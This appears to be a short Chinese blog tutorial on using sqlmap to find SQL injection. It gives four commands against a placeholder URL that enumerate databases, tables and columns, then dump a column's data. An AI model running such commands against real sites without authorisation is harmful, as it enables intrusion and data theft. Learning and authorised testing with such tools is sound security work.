Sqlmap检测SQL注入攻击
目录
这款工具好用,检测SQL漏洞注入精确,国内也有好几个SQL注入工具,博主以前也写过注入类似渗透工具,跟啊D注入、明小子注入,那个时代;
1、测试SQL注入:
1sqlmap -u http://www.test.com/index.php?id=1 --dbs
2、获得某个数据库中的表:
1sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables
3、获得表的字段:
1sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables -T some_table --columns
4、下载某一字段的数据:
1sqlmap -u http://www.test.com/index.php?id=1 --dbs -D some_db --tables -T some_table --columns -C some_col --dump
神器下载地址,因为看到有人留言想要,还说想要源码,好吧、更新贴出它们官方网站吧。